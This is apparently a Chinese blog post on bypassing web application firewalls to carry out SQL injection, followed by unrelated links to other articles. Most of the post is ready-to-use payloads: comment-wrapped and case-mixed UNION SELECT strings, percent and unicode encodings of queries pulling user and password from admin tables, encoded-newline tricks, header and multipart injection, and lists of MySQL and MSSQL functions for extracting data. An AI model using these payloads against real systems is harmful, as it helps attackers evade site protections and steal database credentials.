f1gure
f1gure

绕waf技巧之sql注入

waf,全名web application firewall,名为web应用防火墙,其实就是市面上的狗、锁、盾、神、宝等等。。可以保护主机、监控流量等。

waf会对sql注入进行过滤,弃置等操作致使sql注入失败,但是也有很多绕过方法

1.使用注释符:

“#”   “--+” “ -- -”   “//“      ”/**/“等等

举例:index.php?id=15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

2.使用科学记数法:

举例:index.php?id=1e1union select urser,password from mysql.user

3.使用使用大小写:

举例:index.php?id=15 uNIoN sELecT 1,2,3,4….

4.关键字替换:

举例:index.php?id=15 UNIunionON SELselectECT 1,2,3,4….

5.内部注释:

(1)asp+iis环境中,可能会忽略%,而waf不会,所以可尝试以下方法:

        id=1' union se%lect user fr%om username

 (2)iis支持unicode解析,会自动转换unicode编码,但waf不会转换,所以:

id=\u0031\u0020\u0075\u006e\u0069\u006f\u006e\u0020\u0073\u0065\u006c\u0065\u0063\u0074\u0020\u0075\u0073\u0065\u0072\u002c\u0070\u0061\u0073\u0073\u0077\u006f\u0072\u0064\u0020\u0066\u0072\u006f\u006d\u0020\u0061\u0064\u006d\u0069\u006e

转换后是id=1 union select user,password from admin

也可以做单个字符的转换,例如:s%u0065lect      s%u00f0lect    下面列出可能有用的转换:

字母a:%u0000、%u0041、%u0061、%u00aa、%u00e2

' :%u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27

空白:%c0020、%cff00


6. url 编码变形

例如:?id=1 union%23%0Aselect user from ...

          ?id=1 union%2d%2d%0Aselect user from ...


7. 特殊绕过:

select(from) 可能可以绕过

union(select 1,(select ... from ... ))可能可以绕过

id=.1 union select ... from ...可能可以绕过

使用mysql自定义变量的特性:?id=1|@pwd:=(select ... from ... where id =1) union select @pwd;

有些waf对post注入检查而不检查url

8. 可以不局限于get,post方式的绕过,可以对各种head头选择绕过,如cookie,x-forwarded-for等。例如:

content-disposition : from-data;name="id" 

1' union select 1,2,3,4,5-- 

这里提一个HPI:http参数注入,攻击者可以在应用程序服务器提出的后端http请求中注入任意参数。如果注入后端请求中已存在的参数,就可以利用http参数污染(HPP)攻击覆盖服务器指定的原始参数值。需要观察目标服务器如何处理多个同名参数,以及后端请求中的插入点是否正确




最后附录可运用的sql函数&关键字:

MySQL:
    union distinct
    union distinctrow
    procedure analyse()
    updatexml()
    extracavalue()
    exp()
    ceil()
    atan()
    sqrt()
    floor()
    ceiling()
    tan()
    rand()
    sign()
    greatest()
字符串截取函数
    Mid(version(),1,1)
    Substr(version(),1,1)
    Substring(version(),1,1)
    Lpad(version(),1,1)
    Rpad(version(),1,1)
    Left(version(),1)
    reverse(right(reverse(version()),1)
字符串连接函数
    concat(version(),'|',user());
    concat_ws('|',1,2,3)
字符转换
    Char(49)
    Hex('a')
    Unhex(61)
    过滤了逗号
limit处的逗号:
    limit 1 offset 0
字符串截取处的逗号
    mid处的逗号:
    mid(version() from 1 for 1)
 MSSQL:
    IS_SRVROLEMEMBER()
    IS_MEMBER()
    HAS_DBACCESS()
    convert()
    col_name()
    object_id()
    is_srvrolemember()
    is_member()
字符串截取函数
    Substring(@@version,1,1)
    Left(@@version,1)
    Right(@@version,1)
字符串转换函数
    Ascii('a') 这里的函数可以在括号之间添加空格的,一些waf过滤不严会导致bypass
    Char('97')
    exec

你可能感兴趣的:(绕waf技巧之sql注入)

  • 机器学习之向量化 珠峰日记 AI理论与实践机器学习人工智能
    文章目录向量化是什么为什么要向量化提升计算效率简化代码与增强可读性适配模型需求怎么做向量化数据预处理特征提取特征选择向量构建机器学习与深度学习中向量化的区别数据特征提取方式机器学习深度学习模型结构与复杂度机器学习深度学习计算资源需求机器学习深度学习数据规模适应性机器学习深度学习向量化是什么向量化是把数据转化为向量形式进行表示与处理的过程。在机器学习与深度学习的范畴内,现实中的各类数据,像文本、图像
  • 【脑洞小剧场】零帧起手创业小公司之 新人入职的一天 Foyo Designer 技术职场小剧职场和发展程序人生学习方法改行学it创业创新远程工作程序员创富
    点击查看小剧场合集https://blog.csdn.net/foyodesigner/category_12896948.html阳光明媚的早晨,段萌儿怀揣着对新工作的无限憧憬,踏入了这家充满未知的小公司。然而,她万万没想到,第一天上班就迎来了一场“惊悚”之旅。场景一:段萌儿的“惊悚”发现段萌儿,新入职的前端工程师,一早便迫不及待地打开了公司的代码库,想要一窥项目的“真容”。然而,当她看到代码库
  • 利用deepseek AI制作视频的小白教程 银行金融科技 银行信息系统架构详解机器学习人工智能deepseek
    以下是基于DeepSeekAI的完整视频制作教程,涵盖从剧本到成片的全流程操作(附关键技巧):一、前期准备(1天)1.分镜优化根据之前的分镜脚本,用Notion或Excel整理出AI友好型分镜表(示例):画面描述关键词时长动态水墨展开成卷轴水墨山水、花瓣特效、东晋风格15秒Q版人物在曲水流觞放纸船全息投影、透明茶具、童声配音45秒2.素材预生成文本转图像:bash#用DeepSeekCoder生成
  • python技巧之下划线 老虎也淘气 Python编程掌握指南pythondjango开发语言
    ‍♂️个人主页@老虎也淘气个人主页✍作者简介:Python学习者希望大家多多支持我们一起进步!如果文章对你有帮助的话,欢迎评论点赞收藏加关注python技巧之下划线1、python的moudles文件中__all__作用2、__slots__用于限定类属性,如:3、下面的小技巧可以获取私有变量:4、下划线种类单个下划线(_)单下划线前缀的名称(例如_shahriar)双下划线前缀的名称(例如__s
  • 软件设计师之编译原理核心知识深度剖析:从词法到语法分析 一杯年华@编程空间 软考中级软考中级
    软件设计师之编译原理核心知识深度剖析:从词法到语法分析在软件开发的知识体系中,编译原理是极为关键的一环,它就像一座桥梁,连接着人类可读的程序代码与计算机能够执行的机器指令。我写这篇博客的目的,是希望和大家一起学习进步,深入剖析编译原理中的词法分析和语法分析等核心知识,让这些复杂的概念变得通俗易懂,助力大家在软件设计领域更上一层楼。一、词法分析相关知识(一)正规表达式与正规集正规表达式是描述词法规则
  • NLP高频面试题(四)——BN和LN的区别与联系,为什么attention要用LN Chaos_Wang_ NLP常见面试题自然语言处理人工智能
    在深度学习模型中,Normalization是一种极为重要的技巧,BatchNormalization(BN)和LayerNormalization(LN)是其中最为常用的两种方法。然而,二者在实际应用中有着明显的区别与联系,尤其在Transformer的Attention机制中,LN有着独特的优势。一、BN与LN的核心区别与联系1.BatchNormalization(BN)BN的思想源于一个叫
  • Vue 过滤器深度解析与应用实践 二川bro 前端vue.js前端javascript
    文章目录1.过滤器概述1.1核心概念1.2过滤器生命周期2.过滤器基础2.1过滤器定义2.2过滤器使用3.过滤器高级用法3.1链式调用3.2参数传递3.3动态过滤器4.过滤器应用场景4.1文本格式化4.2数字处理4.3数据过滤5.性能优化与调试5.1性能优化策略5.2调试技巧6.最佳实践建议6.1命名规范6.2代码组织7.常见问题与解决方案7.1问题列表7.2调试技巧8.扩展阅读1.过滤器概述1.
  • 【 <二> 丹方改良:Spring 时代的 JavaWeb】之 Spring Boot 的起步依赖:快速构建 JavaWeb 项目 Foyo Designer springspringbootjavaSpringDataJPAJUnit
    点击此处查看合集https://blog.csdn.net/foyodesigner/category_12907601.html?fromshare=blogcolumn&sharetype=blogcolumn&sharerId=12907601&sharerefer=PC&sharesource=FoyoDesigner&sharefrom=from_link一、起步依赖:SpringBoo
  • MySQL(二):逻辑查询 2401_84003690 程序员mysqlandroid数据库
    CREATETABLEt(aCHAR(5))ENGINE=INNODB;INSERTINTOt(a)VALUES(‘a’),(NULL),(‘b’),(‘c’),(NULL);SELECT*FROMtORDERBYa;//这也是一个小技巧,当想使用GROUPBY后,想统计各个组/块的数量,可以使用COUNT(1)SELECTa,COUNT(1)FROMtGROUPBYa;结果如上,很清楚可以看到o
  • Spring之Bean生命周期源码解析-一文掌握(一) 小徐Chao努力 源码分析springjava后端
    Spring最重要的功能就是帮助程序员创建对象(也就是IOC),而启动Spring就是为创建Bean对象做准备,所以我们先明白Spring到底是怎么去创建Bean的,也就是先弄明白Bean的生命周期。Bean的生命周期就是指:在Spring中,一个Bean是如何生成的,如何销毁的Bean的生成过程1.生成BeanDefinitionSpring启动的时候会进行扫描,会先调用org.springfr
  • Spring之底层架构核心概念解析 小徐Chao努力 源码分析springjava后端设计模式
    BeanDefinitionBeanDefinition表示Bean定义,BeanDefinition中存在很多属性用来描述一个Bean的特点。比如:class,表示Bean类型scope,表示Bean作用域,单例或原型等lazyInit:表示Bean是否是懒加载initMethodName:表示Bean初始化时要执行的方法destroyMethodName:表示Bean销毁时要执行的方法还有很多
  • goldengate sqlserver mysql_Oracle GoldenGate 之 SqlServer数据同步到Mysql数据库 Huawei_Germany goldengatesqlservermysql
    C:\OGG>INSTALLADDSERVICEService'GGSMGR'created.Installprogramterminatednormally.C:\OGG>配置ODBC数据源MicrosoftSQLServerODBC驱动程序版本06.01.7601数据源名称:oa_test数据源描述:服务器:WIN-UGCMTTOTKE7数据库:(Default)语言:(Default)翻译字
  • 《我的Python觉醒之路》之转型Python(十五)——控制流 Python破壁人手记 python服务器网络开发语言java
    [今天是2025年3月17日,继续复习第一章节、第二章节的内容]《我的Python觉醒之路》之转型Python(十四)——控制流
  • AI 创业团队:技术人才与商业人才的完美搭配 yaxin0765 人工智能
    目录一、技术人才的核心价值二、商业人才的关键作用三、实现完美搭配的策略在AI创业的赛道上,一个优秀的团队是决定企业成败的关键因素。而在这个团队中,技术人才与商业人才的完美搭配,如同鸟之双翼、车之两轮,缺一不可。他们各自发挥独特优势,相互协作,共同推动AI创业企业驶向成功的彼岸。一、技术人才的核心价值奠定技术根基:技术人才是AI创业企业的技术基石。他们精通各类AI算法、编程语言和开发框架,能够搭建起
  • 【Python】Flask与Django对比详解:教你如何选择最适合你的Web框架 小芬熊 面试学习路线阿里巴巴pythonflaskdjango
    文章目录引言:为何选择PythonWeb框架?Flask简介:轻量级的灵活之选??Flask的核心特点Django简介:全能型的强大框架??Django的核心特点Flask与Django的详细对比架构设计功能与扩展性性能与效率模板系统ORM(对象关系映射)详细对比表格适用场景总结案例分享:如何选择适合的框架小李的博文项目:选择Flask??小张的电商平台:选择Django??了解更多AI内容结论:
  • python 中如何Debug 测试小白球 BUG记录pythondebug
    debug是编码是非常重要的调试技巧,通过在运行过程中设置断点,帮助开发人员更好的理解运行过程。Python的debug方式:使用pdb模块。importpdb;pdb.set_trace()使用方法:在需要设置断点的地方,插入方法pdb.set_trace()defapple_task_list():method=request.method.lower()importpdb;pdb.set_t
  • 深入浅出 -- 系统架构之负载均衡Nginx配置SSL证书 xiaoli8748_软件开发 系统架构系统架构负载均衡nginx
    一、Nginx配置SSL证书随着越来越多的网站接入HTTPS,因此Nginx中仅配置HTTP还不够,往往还需要监听443端口的请求,但在上篇《HTTP/HTTPS》中谈到过,HTTPS为了确保通信安全,所以服务端需配置对应的数字证书,当项目使用Nginx作为网关时,那么证书在Nginx中也需要配置,接下来简单聊一下关于SSL证书配置过程:①先去CA机构或从云控制台中申请对应的SSL证书,审核通过后
  • 面试经验分享 | 某安全厂商HW面试经验 渗透测试老鸟-九青 面试经验分享安全web安全网络xsscsrf
    目录:所面试的公司:某安全厂商所在城市:安徽省面试职位:蓝初面试过程:面试官的问题:所面试的公司:某安全厂商所在城市:安徽省面试职位:蓝初面试过程:腾讯会议(语音)面试过程:整体流程就是自我介绍加上一些问题问题balabalabala。。。由于面的是蓝队所以渗透部分不会太多,回答部分基本上是我的原答案,不保证正确。面试总体大概分三个大块(下面跳过自我介绍部分)面试官的问题:1、sql注入原理攻击者
  • jquery查找父窗体id_JS与jQuery实现子窗口获取父窗口元素值的方法 北木南烟 jquery查找父窗体id
    这篇文章主要介绍了JS与jQuery实现子窗口获取父窗口元素值的方法,涉及javascript与jQuery操作窗口元素的相关技巧,需要的朋友可以参考下本文实例讲述了JS与jQuery实现子窗口获取父窗口元素值的方法。分享给大家供大家参考,具体如下:功能描述:父窗口有一个input,和一个button,点击button打开子窗口,在子窗口中获取父窗口中input的值,并显示。js:父窗口:子窗口:
  • 全网测评:2025年最值得中小企业入局的AI无人直播软件花落谁家? V_13135861102 人工智能
    全网测评:2025年最值得中小企业入局的AI无人直播软件花落谁家?在数字化时代,人工智能技术的快速发展为各行各业带来了深刻的变革。直播电商领域也迎来了前所未有的机遇,AI无人直播软件应运而生,逐步改变着传统电商和直播行业的运营模式。对于预算有限、希望实现高效营销的中小企业而言,选择一款合适的AI无人直播软件显得尤为重要。本文将测评几款热门的AI无人直播软件,帮助中小企业找到最适合自己的入局之选。一
  • CSS 溢出问题及解决方案:实用案例与技巧 Judy1623 css前端
    在网页开发中,CSS的布局和样式起着至关重要的作用,但经常会遇到一个棘手的问题——溢出问题。溢出是指元素内的内容超出了其设定的容器大小,这不仅会影响页面的美观,还可能干扰用户体验。本文将详细探讨CSS溢出问题的案例,并提供常见的解决方法,同时给出相应的代码示例以供验证。visible:默认值,内容不会被剪裁,也不会显示滚动条。hidden:内容会被剪裁,并且不会显示滚动条。scroll:内容会被剪
  • Qt之自定义界面组件 一 此刻我在家里喂猪呢 qtqt
    通过qt中的painter绘图事件绘制一个电池电量图的变化。效果如下图创建一个基于界面widget工程,在wdiget界面添加一个widget界面,将添加的widget界面的类提升为Tbattery.在Tbattery类中重写painEvent电池电量代码文件目录结构主要部分代码//Tbattery.cpp#include"tbattery.h"#include#includeTbattery::
  • 高薪程序员&面试题精讲系列131之Eureka如何实现高可用?自我保护机制是怎么回事? 一一哥Sun Java高薪面试题精讲系列eurekaspringcloudjava
    一.面试题及剖析1.今日面试题你熟悉Eureka吗?服务治理是怎么回事?Eureka的服务治理包含哪些内容?自我保护机制是怎么回事?Eureka怎么实现高可用?Eureka挂了,服务间还能通信吗?Eureka的工作原理是怎么样的?2.题目剖析在上一篇文章中,
  • 5周0基础冲刺蓝桥杯省重点 4 杰克尼 [速成蓝桥杯]0基础冲省奖重点蓝桥杯职场和发展
    目录[算法题解]李白打酒题目详情问题描述题目描述运行限制代码实现cpp运行结果总结分享算法题解是我记录学习、交流进步的方式~如果这篇文章对你有帮助,欢迎关注我的CSDN账号杰克尼,后续会持续更新更多算法题解、编程技巧,一起在代码的世界里探索成长![算法题解]李白打酒嗨,大家好!我是杰克尼,最近在疯狂刷算法题提升编程能力~今天分享一道很有意思的算法题解题过程。无论是算法新手还是想交流思路的小伙伴,都
  • 软件测试肖sir__接口测试之基本介绍(2) 金牌软件测试培训师肖sir 接口
    接口测试之基本介绍搭建环境cms:url:http://cms.duoceshi.cn/cms/manage/login.do一、接口基本介绍1、什么是接口测试?定义:接口统称api,程序与程序之间的数据交换;模块与模块之间的数据交换;2、为什么做接口?(1)能够尽早介入测试;(2)能测试功能无法测试的场景(3)节约时间;(先进行接口测试,在进行功能测试,能节省测试时间)3、如何做接口?通过工具p
  • Flask应用调试模式下外网访问的技巧 带娃的IT创业者 flaskpython后端
    Flask应用调试模式下外网访问的技巧在调试模式下让外网访问你的Flask应用需要注意安全性问题,因为调试模式会暴露更多信息。以下是几种方法让你在开发过程中从外网访问你的应用:方法一:修改Flask运行参数最简单的方法是修改Flask的运行参数,让它监听所有网络接口:flaskrun--host=0.0.0.0--port=5000或者在Python脚本中:python-c"fromappimpo
  • 蓝桥杯嵌入式之按位点灯 按键长按、短按、双击操作(附源码) 啦啦啦1021 MCU外设常用器件分享蓝桥杯单片机stm32
    蓝桥杯嵌入式之按位点灯按键长按、短按、双击操作(附源码)GPIO引脚配置原理STM32的每个IO端口都有7个寄存器来控制,分别是:CRH、CHL、ODR、IDR、BSRR、BRR、LCLK,加上APB2外设时钟使能寄存器ACC->APB2ENR就可以实现对IO口的所有操作了。不管是库函数还是HAL库究其根源都是通过控制这几个寄存器实现的。各个寄存器功能如下:CRH和CRL寄存器:IO口的模式和输出
  • flutter 专题 九十 三 Flutter开发之基础Widgets leluckys Flutter面试与实战flutterjavascript命令模式
    Widgets概念Flutter里有一个非常重要的核心理念:一切皆为组件,Flutter的所有元素都是由控件构成的。与原生开发中控件所代表的含义不同,Flutter中widget的概念更加广泛,它不仅可以表示UI元素,也可以表示一些功能性的组件,如用于手势检测的GestureDetectorwidget、用于应用主题数据传递的Theme等等。而原生开发中的控件通常只是指UI元素。由于Flutter
  • OpenCV图像拼接(2)特征查找与图像匹配之基于仿射变换的图像匹配的一个类cv::detail::AffineBestOf2NearestMatcher 村北头的码农 OpenCVopencv人工智能计算机视觉
    操作系统:ubuntu22.04OpenCV版本:OpenCV4.9IDE:VisualStudioCode编程语言:C++11算法描述cv::detail::AffineBestOf2NearestMatcher是OpenCV库中用于实现基于仿射变换的图像匹配的一个类。这个类主要用于在图像拼接流程中,寻找图像间的对应关系,并假设图像间存在仿射变换(即考虑缩放、旋转和平移的变换)。它通过使用“最佳
  • 7招教你掌握用DeepSeek辅助论文写作的提示词技巧 学境思源AcademicIdeas 学境思源AI写作ChatGPT人工智能
    随着人工智能技术的快速发展,大模型(如DeepSeek、ChatGPT等)已经成为论文写作的重要辅助工具。合理运用提示词(Prompt),不仅能极大提高写作效率,还能辅助生成高质量的学术内容。今天的内容将分享如何利用DeepSeek的提示词技巧,助力论文写作。1.明确写作目标,让AI理解你的需求在使用大模型时,清晰的写作目标至关重要。一个好的提示词应当包括:写作主题、内容范围、格式要求、风格倾向等
  • SAX解析xml文件 小猪猪08 xml
    1.创建SAXParserFactory实例 2.通过SAXParserFactory对象获取SAXParser实例 3.创建一个类SAXParserHander继续DefaultHandler,并且实例化这个类 4.SAXParser实例的parse来获取文件     public static void main(String[] args) { //
  • 为什么mysql里的ibdata1文件不断的增长? brotherlamp linuxlinux运维linux资料linux视频linux运维自学
    我们在 Percona 支持栏目经常收到关于 MySQL 的 ibdata1 文件的这个问题。 当监控服务器发送一个关于 MySQL 服务器存储的报警时,恐慌就开始了 —— 就是说磁盘快要满了。 一番调查后你意识到大多数地盘空间被 InnoDB 的共享表空间 ibdata1 使用。而你已经启用了 innodbfileper_table,所以问题是: ibdata1存了什么? 当你启用了 i
  • Quartz-quartz.properties配置 eksliang quartz
    其实Quartz JAR文件的org.quartz包下就包含了一个quartz.properties属性配置文件并提供了默认设置。如果需要调整默认配置,可以在类路径下建立一个新的quartz.properties,它将自动被Quartz加载并覆盖默认的设置。   下面是这些默认值的解释 #-----集群的配置 org.quartz.scheduler.instanceName =
  • informatica session的使用 18289753290 workflowsessionlogInformatica
    如果希望workflow存储最近20次的log,在session里的Config  Object设置,log  options做配置,save  session log :sessions  run  ;savesessio log for  these runs:20 session下面的source 里面有个tracing 
  • Scrapy抓取网页时出现CRC check failed 0x471e6e9a != 0x7c07b839L的错误 酷的飞上天空 scrapy
    Scrapy版本0.14.4 出现问题现象: ERROR: Error downloading <GET http://xxxxx  CRC check failed   解决方法   1.设置网络请求时的header中的属性'Accept-Encoding': '*;q=0'   明确表示不支持任何形式的压缩格式,避免程序的解压
  • java Swing小集锦 永夜-极光 java swing
    1.关闭窗体弹出确认对话框   1.1   this.setDefaultCloseOperation (JFrame.DO_NOTHING_ON_CLOSE);   1.2   this.addWindowListener ( new WindowAdapter () { public void windo
  • 强制删除.svn文件夹 随便小屋 java
              在windows上,从别处复制的项目中可能带有.svn文件夹,手动删除太麻烦,并且每个文件夹下都有。所以写了个程序进行删除。因为.svn文件夹在windows上是只读的,所以用File中的delete()和deleteOnExist()方法都不能将其删除,所以只能采用windows命令方式进行删除
  • GET和POST有什么区别?及为什么网上的多数答案都是错的。 aijuans get post
        如果有人问你,GET和POST,有什么区别?你会如何回答? 我的经历      前几天有人问我这个问题。我说GET是用于获取数据的,POST,一般用于将数据发给服务器之用。     这个答案好像并不是他想要的。于是他继续追问有没有别的区别?我说这就是个名字而已,如果服务器支持,他完全可以把G
  • 谈谈新浪微博背后的那些算法 aoyouzi 谈谈新浪微博背后的那些算法
    本文对微博中常见的问题的对应算法进行了简单的介绍,在实际应用中的算法比介绍的要复杂的多。当然,本文覆盖的主题并不全,比如好友推荐、热点跟踪等就没有涉及到。但古人云“窥一斑而见全豹”,希望本文的介绍能帮助大家更好的理解微博这样的社交网络应用。 微博是一个很多人都在用的社交应用。天天刷微博的人每天都会进行着这样几个操作:原创、转发、回复、阅读、关注、@等。其中,前四个是针对短博文,最后的关注和@则针
  • Connection reset 连接被重置的解决方法 百合不是茶 java字符流连接被重置
    流是java的核心部分,,昨天在做android服务器连接服务器的时候出了问题,就将代码放到java中执行,结果还是一样连接被重置   被重置的代码如下;   客户端代码; package 通信软件服务器; import java.io.BufferedWriter; import java.io.OutputStream; import java.io.O
  • web.xml配置详解之filter bijian1013 javaweb.xmlfilter
    一.定义 <filter> <filter-name>encodingfilter</filter-name> <filter-class>com.my.app.EncodingFilter</filter-class> <init-param> <param-name>encoding<
  • Heritrix Bill_chen 多线程xml算法制造配置管理
    作为纯Java语言开发的、功能强大的网络爬虫Heritrix,其功能极其强大,且扩展性良好,深受热爱搜索技术的盆友们的喜爱,但它配置较为复杂,且源码不好理解,最近又使劲看了下,结合自己的学习和理解,跟大家分享Heritrix的点点滴滴。 Heritrix的下载(http://sourceforge.net/projects/archive-crawler/)安装、配置,就不罗嗦了,可以自己找找资
  • 【Zookeeper】FAQ bit1129 zookeeper
    1.脱离IDE,运行简单的Java客户端程序 #ZkClient是简单的Zookeeper~$ java -cp "./:zookeeper-3.4.6.jar:./lib/*" ZKClient    1. Zookeeper是的Watcher回调是同步操作,需要添加异步处理的代码 2. 如果Zookeeper集群跨越多个机房,那么Leader/
  • The user specified as a definer ('aaa'@'localhost') does not exist 白糖_ localhost
    今天遇到一个客户BUG,当前的jdbc连接用户是root,然后部分删除操作都会报下面这个错误:The user specified as a definer ('aaa'@'localhost') does not exist 最后找原因发现删除操作做了触发器,而触发器里面有这样一句 /*!50017 DEFINER = ''aaa@'localhost' */  原来最初
  • javascript中showModelDialog刷新父页面 bozch JavaScript刷新父页面showModalDialog
    在页面中使用showModalDialog打开模式子页面窗口的时候,如果想在子页面中操作父页面中的某个节点,可以通过如下的进行:       window.showModalDialog('url',self,‘status...’); // 首先中间参数使用self       在子页面使用w
  • 编程之美-买书折扣 bylijinnan 编程之美
    import java.util.Arrays; public class BookDiscount { /**编程之美 买书折扣 书上的贪心算法的分析很有意思,我看了半天看不懂,结果作者说,贪心算法在这个问题上是不适用的。。 下面用动态规划实现。 哈利波特这本书一共有五卷,每卷都是8欧元,如果读者一次购买不同的两卷可扣除5%的折扣,三卷10%,四卷20%,五卷
  • 关于struts2.3.4项目跨站执行脚本以及远程执行漏洞修复概要 chenbowen00 strutsWEB安全
    因为近期负责的几个银行系统软件,需要交付客户,因此客户专门请了安全公司对系统进行了安全评测,结果发现了诸如跨站执行脚本,远程执行漏洞以及弱口令等问题。 下面记录下本次解决的过程以便后续 1、首先从最简单的开始处理,服务器的弱口令问题,首先根据安全工具提供的测试描述中发现应用服务器中存在一个匿名用户,默认是不需要密码的,经过分析发现服务器使用了FTP协议, 而使用ftp协议默认会产生一个匿名用
  • [电力与暖气]煤炭燃烧与电力加温 comsci
          在宇宙中,用贝塔射线观测地球某个部分,看上去,好像一个个马蜂窝,又像珊瑚礁一样,原来是某个国家的采煤区.....       不过,这个采煤区的煤炭看来是要用完了.....那么依赖将起燃烧并取暖的城市,在极度严寒的季节中...该怎么办呢?   &nbs
  • oracle O7_DICTIONARY_ACCESSIBILITY参数 daizj oracle
    O7_DICTIONARY_ACCESSIBILITY参数控制对数据字典的访问.设置为true,如果用户被授予了如select any table等any table权限,用户即使不是dba或sysdba用户也可以访问数据字典.在9i及以上版本默认为false,8i及以前版本默认为true.如果设置为true就可能会带来安全上的一些问题.这也就为什么O7_DICTIONARY_ACCESSIBIL
  • 比较全面的MySQL优化参考 dengkane mysql
    本文整理了一些MySQL的通用优化方法,做个简单的总结分享,旨在帮助那些没有专职MySQL DBA的企业做好基本的优化工作,至于具体的SQL优化,大部分通过加适当的索引即可达到效果,更复杂的就需要具体分析了,可以参考本站的一些优化案例或者联系我,下方有我的联系方式。这是上篇。   1、硬件层相关优化   1.1、CPU相关   在服务器的BIOS设置中,可
  • C语言homework2,有一个逆序打印数字的小算法 dcj3sjt126com c
    #h1#   0、完成课堂例子 1、将一个四位数逆序打印 1234 ==> 4321 实现方法一: # include <stdio.h> int main(void) { int i = 1234; int one = i%10; int two = i / 10 % 10; int three = i / 100 % 10;
  • apacheBench对网站进行压力测试 dcj3sjt126com apachebench
       ab 的全称是 ApacheBench , 是 Apache 附带的一个小工具 , 专门用于 HTTP Server 的 benchmark testing , 可以同时模拟多个并发请求。前段时间看到公司的开发人员也在用它作一些测试,看起来也不错,很简单,也很容易使用,所以今天花一点时间看了一下。 通过下面的一个简单的例子和注释,相信大家可以更容易理解这个工具的使用。
  • 2种办法让HashMap线程安全 flyfoxs javajdkjni
    多线程之--2种办法让HashMap线程安全 多线程之--synchronized 和reentrantlock的优缺点 多线程之--2种JAVA乐观锁的比较( NonfairSync VS. FairSync)     HashMap不是线程安全的,往往在写程序时需要通过一些方法来回避.其实JDK原生的提供了2种方法让HashMap支持线程安全.  
  • Spring Security(04)——认证简介 234390216 Spring Security认证过程
    认证简介 目录 1.1     认证过程 1.2     Web应用的认证过程 1.2.1    ExceptionTranslationFilter 1.2.2    在request之间共享SecurityContext   1
  • Java 位运算 Javahuhui java位运算
    // 左移( << ) 低位补0 // 0000 0000 0000 0000 0000 0000 0000 0110 然后左移2位后,低位补0: // 0000 0000 0000 0000 0000 0000 0001 1000 System.out.println(6 << 2);// 运行结果是24 // 右移( >> ) 高位补"
  • mysql免安装版配置 ldzyz007 mysql
    1、my-small.ini是为了小型数据库而设计的。不应该把这个模型用于含有一些常用项目的数据库。 2、my-medium.ini是为中等规模的数据库而设计的。如果你正在企业中使用RHEL,可能会比这个操作系统的最小RAM需求(256MB)明显多得多的物理内存。由此可见,如果有那么多RAM内存可以使用,自然可以在同一台机器上运行其它服务。 3、my-large.ini是为专用于一个SQL数据
  • MFC和ado数据库使用时遇到的问题 你不认识的休道人 sqlC++mfc
    =================================================================== 第一个 =================================================================== try{ CString sql; sql.Format("select * from p
  • 表单重复提交Double Submits rensanning double
    可能发生的场景: *多次点击提交按钮 *刷新页面 *点击浏览器回退按钮 *直接访问收藏夹中的地址 *重复发送HTTP请求(Ajax) (1)点击按钮后disable该按钮一会儿,这样能避免急躁的用户频繁点击按钮。 这种方法确实有些粗暴,友好一点的可以把按钮的文字变一下做个提示,比如Bootstrap的做法: http://getbootstrap.co
  • Java String 十大常见问题 tomcat_oracle java正则表达式
     1.字符串比较,使用“==”还是equals()?   "=="判断两个引用的是不是同一个内存地址(同一个物理对象)。   equals()判断两个字符串的值是否相等。   除非你想判断两个string引用是否同一个对象,否则应该总是使用equals()方法。   如果你了解字符串的驻留(String Interning)则会更好地理解这个问题。    
  • SpringMVC 登陆拦截器实现登陆控制 xp9802 springMVC
    思路,先登陆后,将登陆信息存储在session中,然后通过拦截器,对系统中的页面和资源进行访问拦截,同时对于登陆本身相关的页面和资源不拦截。   实现方法: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他